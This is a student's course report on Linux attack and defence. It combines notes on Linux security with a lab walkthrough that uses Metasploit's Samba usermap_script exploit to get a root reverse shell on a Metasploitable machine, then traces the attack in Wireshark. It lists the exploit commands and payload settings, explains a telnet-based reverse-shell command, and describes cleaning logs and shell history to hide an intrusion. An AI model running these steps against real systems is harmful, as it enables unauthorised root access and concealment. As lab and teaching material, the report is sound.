20199106 2019-2020-2 "Network Attack and Defense Practice" Week 8 Assignment

20199106 2019-2020-2 "Network Attack and Defense Practice" Week 8 Assignment

Job description

Which course does this assignment belong to	Network offensive and defensive practice
What are the requirements for this assignment	Eighth homework: offensive and defensive Linux operating system
My goal in the course	Have a relatively comprehensive understanding of network offensive and defensive technologies, and be able to master basic offensive and defensive operations.
What specific aspect of this assignment helped me achieve my goal	Learned the knowledge and system of network attack and defense of Linux system.

Homework

Practice content

Linux operating system basic framework

• The advantages of Linux operating system : open source code and free, cross-platform hardware support, rich software support, multi-user multi-tasking, reliable security (with firewall, intrusion detection and security certification tools, etc., to repair system vulnerabilities in time ), Good stability, perfect network function.

• Linux system structure :

• Linux process and thread management mechanism: The Linux kernel adopts a preemptive multi-user multi-process mode, multiple processes are concurrently active, and the kernel's process management module is responsible for scheduling hardware resources for use.
• Linux memory management mechanism: The Linux memory management module allows multiple processes to safely share the physical memory area. Each process has an independent 4GB virtual memory space. The kernel code and data segment are mapped to more than 3GB space. The space is 0-3GB.
• Linux file system management mechanism: The Linux kernel uses the virtual file management VFS mechanism, which can support dozens of different types of logical file systems.
• Linux device control mechanism: The software that handles or manages the hardware controller in the Linux kernel is called a device driver. Linux abstracts the processing of devices. All hardware devices are treated like regular files. Three types of hardware devices are supported: character devices, block devices, and network devices. Character devices directly read / write without buffers; block devices read / write in units of blocks; network devices access through network interfaces.
• Linux network mechanism: The network module in the Linux kernel provides access to multiple network standards and support for various network hardware. The network interface can be divided into a network protocol stack and a network driver. The network protocol stack is responsible for implementing various possible network transmission protocols, and the network driver is responsible for communication with hardware devices.
• Linux system call mechanism: The above kernel module runs in the core state of the CPU, and the application program runs in the user state. The Linux system call interface allows applications to access hardware devices and other resources through it, ensuring the stability and security of the entire system.

Linux operating system security mechanism

• Identity authentication mechanism

  • Linux implements user identity management by creating users and user groups with multiple role types to ensure that multiple users use the Linux operating system safely;
  • Linux user classification: root root user, ordinary user, system user; user information is saved in / etc / passwd;
  • Linux user group: is a collection of user accounts with the same characteristics, user group information is saved in the system's / etc / group file;
  • Linux supports local login user authentication mechanism and remote login user authentication mechanism.
  • Linux's unified identity authentication middleware-PAM (pluggable identity authentication module), supports four management interfaces: authentication management, account management, password management, session management.

• Authorization and access control mechanism

  • Access control of all files and device resources is implemented through the VFS virtual file system.
  • In the virtual file system security model of Linux, system authorization and access control are mainly carried out through the file owner, file access permissions and some special permission bits.
  • Deficiency: Users can only be divided into three categories: owner, owner's group, and other users to assign permissions, and cannot achieve more granular permissions control.

• Security audit mechanism

  • Mainly achieved through three main log subsystems:
    • Connection time log: executed by multiple programs, enabling system administrators to follow who is logged in to the system when and when.
    • Process statistics log: When a process terminates, write a record to the process statistics file for each process.
    • Error logging: executed by the general logging service.

Linux system remote attack and defense technology

• Attack process against linux system:

  • First of all, the use of technical means such as stepping on points, scanning and checking points to collect information about the target linux system;
  • The attacker then unearths a security loophole or configuration weakness in a network monitoring service from the remote network to obtain local shell access rights;
  • Once access to the shell is obtained, the attacker gains a foothold on the target Linux system and moves to the local attack.

• Linux remote password guessing attack

  • Basic attack form: Sniff user account names through the service or use default internal keys for some accounts (such as Root) to implement password guessing. In addition to remote control network services such as SSH, you can also guess the network services such as HTTP / HTTPS and FTP that have their own account systems and identity authentication mechanisms.
  • Automated remote password guessing tools: Brutus, THC Hydra, Cain and Abel
  • Best defense: Use strong passwords that are not easy to guess
  • Practical measures: Run services that are vulnerable to remote password guessing attacks on non-standard ports; use some password guessing attack detection and defense software; use linux firewall IPTables to limit the access source IP address range of network services vulnerable to remote password guessing attacks, such as SSH .

• Linux network service remote penetration attack

  • The most important attack channel for remote penetration of the system is the penetration and exploitation of network service security vulnerabilities.
  • Network services in the LAMP Web site construction solution: Linux operating system is used as the website server running platform, Apache provides web services based on HTTP / HTTPS, MySQL database management system is used as the background data storage of web applications, and is developed in PHP language And implement web applications. It is precisely because of the dominant position of the LAMP combination solution in the web server, it also makes the service expansion module in the combination become the main remote attack penetration target of the Linux system.
  • FTP, Samba and other file sharing services: FTP is used for file exchange and shared transmission, and generally monitors ports 20 and 21; Samba listens on tcp445 port.
  • E-mail sending and receiving service (sendmail service): the most popular e-mail sending and receiving service on UNIX-like systems, including Linux, and one of the well-known and insecure network services.
  • Other network services, such as OpenSSH (TCP port 22), Open SSL (TCP port 443), NFS (port tcp / udp2049), SNMP (port tcp161 / 162), SUNRPC (port tcp111), BIND (port tcp / udp53), X-Windows (tcp6000 port)
  • Security precautions: disable unnecessary network services, try to choose safer network protocols and service software, update network service versions in a timely manner, use xinetd, add network access control for linux network services, establish an intrusion detection and emergency response plan

• Attack Linux client programs and users

  • Attacking client programs on the Linux platform: The most commonly used client programs for Internet users are Web browsers and email clients, the most popular Web browser: Firefox "Firefox" browser, the most popular email client software: Thunderbird "Thunderbird".
  • Attacking Linux users: When it is difficult to break the server, you can use social engineering methods to get various information from the server administrator through phone, e-mail and other methods, or let it execute certain malicious programs.
  • Preventive measures: regularly update software (apt-get), understand social engineering technology, and increase safety awareness

• Attack linux routers and listeners

  • When Linux is used as a router or when promiscuous mode is turned on, if there are loopholes in the program that implements routing and packet forwarding functions, it is likely to be attacked by constructing packets.
  • Configure ip_forward = 1 to run in router mode, and route.c of the net subsystem implements router addressing and data packet forwarding functions.
  • Attack listener and intrusion detector: Libpcap packet capture library, tcpdump command line program, Wiresahrk network monitoring and protocol analysis software, Snort intrusion detection system. Except for libpcap, others are more or less flawed.
  • Preventive measures: network administrators should establish a sense of security confrontation and game; master the infiltration and intrusion methods of attackers

Linux system local security attack and defense technology

• linux local privilege escalation

  • Crack the password of the root user, and then execute the su or sudo command to upgrade;
  • Discover and exploit security vulnerabilities in su or sudo programs
  • Attack on user mode SUID privilege elevation vulnerability: local buffer overflow attack on SUID program, symbolic link attack on SUID program, race condition attack on SUID program, attack on shared function library of SUID program
  • Attack the privilege escalation of Linux kernel code
  • Search and use global writable sensitive files and directory locations from the system
  • Preventive measures: timely upgrade of privileged code and kernel to repair local privileged security vulnerabilities; avoid using root users for daily operations, etc.

• Disappear on the Linux system

  • The main audit log mechanism is in the / var / log directory, and the event audit function is mainly provided by the system core process, syslogd, and various network services.
  • Change the log of the current activity, often view the contents of the /etc/syslog.cnf configuration file, the system records the authentication and authorization in /var/log/auth.log, and some system alarms, information, and authentication logs are in / var / log / messages file
  • Clean up the history of commands entered in the Shell program (.bash_history file)
  • Precautions: Write the log information to a media medium that is difficult to modify; send the critical log to another secure log server with strict protection.

• Linux system remote control backdoor program

  • Types of remote control backdoor programs implanted on Linux systems: Trojanized system programs, command line backdoor tools, and graphical backdoor tools
  • Graphical remote control software VNC
  • Using rootkit technology to hide backdoor programs

experiment procedure

Hands-on practice: Using Metasploit for Linux remote penetration attacks

Task : Using Metasploit penetration testing software, attacks on Linux drone Sambaservices usermap_scriptsecurity vulnerabilities to get access to the host Linux target drones. The practical steps are as follows:

1. Start Metasploit software, you can use one of msfconsole, msfgui, msfweb according to personal preference;

2. Use exploit: exploit / multi / samba / usermap_script to penetrate the attack module;

3. Choose to attack PAYLOAD as a remote shell (both forward and reverse connections are possible);

4. Set penetration attack parameters (RHOST, LHOST, TARGET, etc.);

5. Perform penetration attacks;

6. Check whether the remote shell is correctly obtained, and check the obtained permissions.

(Samba is a free software that implements the smb protocol on Linux and unix systems, and is composed of a client and a server. SMB is a protocol for sharing files and printers on a local area network. There is a server, and the client can use it on the server Shared file system and printers and other resources. Through settings, you can also share resources with computers around the world.

usermap_script is named username map script, a vulnerability in the Samba protocol. It is generated when a non-default username mapping script configuration option is used. By specifying a username that contains shell metacharacters, an attacker can execute arbitrary commands . )

lab environment

lab environment	IP address
Target machine: Linux Metasploitable	192.168.200.125
Attack aircraft: kali	192.168.200.2

The experimental process is similar to the seventh week.

1. Use commands to msfconsolestart the penetration software

2. search sambaCommand to find the module that attacks the Samba service

3. Command to use exploit/multi/samba/usermap_scriptuse penetration attack module

4, with a show payloadsview to attack the load module

5. The command set PAYLOAD cmd/unix/reversesets the attack payload. This payload is meant to support a two-way connection. Use to show optionsview the parameters that need to be configured

6. Set the address of the attacking machine and the address LHOST set LHOST 192.168.200.2of the target machine RHOST set RHOST 192.168.200.125, use the command show optionsto view again

7. Command exploitto attack, command to shellopen the shell

8. whomaiView the current authority account through the command , and find that the current authority account is rootsuccessfully obtained the target machine operating system and root control authority. Use the command to ifconfigconfirm that the target machine IP address is correct.

Practice assignment: Offensive and defensive confrontation practice

• Attacker: Use Metasploit, select the vulnerabilities found in the Metasploitable target machine to conduct penetration attacks, gain remote control, and try to further gain root permissions.

• Defender: Use tcpdump / wireshark / snort to monitor and obtain network attack packet files, combined with wireshark / snort to analyze the attack process, obtain the attacker's IP, target IP and port, attack initiation time, attack exploit vulnerability, use Shellcode, and success Then enter the information on the command line.

Or choose the above vulnerability, the attack process is the same as above.
Open wireshark before the attack and view the packets captured by wireshark

It can be seen that the attacker's IP address is 192.168.200.2, port 42395; the target IP is 192.168.200.125, port 139.

It can be seen that the attack uses the 139 port vulnerability (port 139 belongs to the TCP service and is used for the Samba service in Unix. Although opening port 139 can provide a sharing service, which is mainly used to provide Windows file and printer sharing, it is often used by attackers. Attack, you can try to obtain the user name and password), it can be seen that the attack used the Samba service vulnerability.

Attack launch time: 2020.4.22 04:58:23;

Tracing the TCP flow of SMB packets, you can see that the shellcode used is as follows:

Code explanation:
nohupYes no hang up, short for running commands without hanging up. This command can continue to run the corresponding process after you log out of the account / close the terminal; it shis the command to run the shell in Linux and is the interpreter of the shell; it is sleepused to delay the current action for a period of time to telnet 192.168.200.5 4444indicate that the data is passed in through the control and communication port 4444 Attacking machine; /dev/null 2>&1means redirecting all standard output and error output to / dev / null, discarding all information that will be generated; the last one &is to let the command execute in the background.

The command executed by the attacker on the target machine after tracing the TCP flow to determine the success of the attack is whoami:ifconfig

Problems encountered in learning and solutions

Learning impression and experience

The operation process of this experiment is relatively smooth, but the analysis process is still not very skilled, still need to learn more and practice.